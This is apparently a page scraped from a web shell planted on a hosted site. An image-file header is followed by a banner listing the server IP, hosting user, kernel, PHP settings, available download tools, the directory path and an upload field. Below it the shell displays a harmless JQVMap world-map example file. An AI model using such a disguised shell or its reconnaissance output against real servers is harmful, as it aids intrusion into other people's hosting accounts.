����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.144.105.204 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/./ideyshare.name.ng/ner2/ucloud/app/assets/admin/vendors/jqvmap/examples/ |
Upload File : |
<?xml version="1.0" encoding="UTF-8"}} <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>JQVMap - World Map</title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <link href="../dist/jqvmap.css" media="screen" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="http://code.jquery.com/jquery-1.11.3.min.js"></script> <script type="text/javascript" src="../dist/jquery.vmap.js"></script> <script type="text/javascript" src="../dist/maps/jquery.vmap.world.js" charset="utf-8"></script> <script type="text/javascript" src="js/jquery.vmap.sampledata.js"></script> <script> jQuery(document).ready(function () { jQuery('#vmap').vectorMap({ map: 'world_en', backgroundColor: '#333333', color: '#ffffff', hoverOpacity: 0.7, selectedColor: '#666666', enableZoom: true, showTooltip: true, scaleColors: ['#C8EEFF', '#006491'], values: sample_data, normalizeFunction: 'polynomial' }); }); </script> </head> <body> <div id="vmap" style="width: 600px; height: 400px;"></div> </body> </html>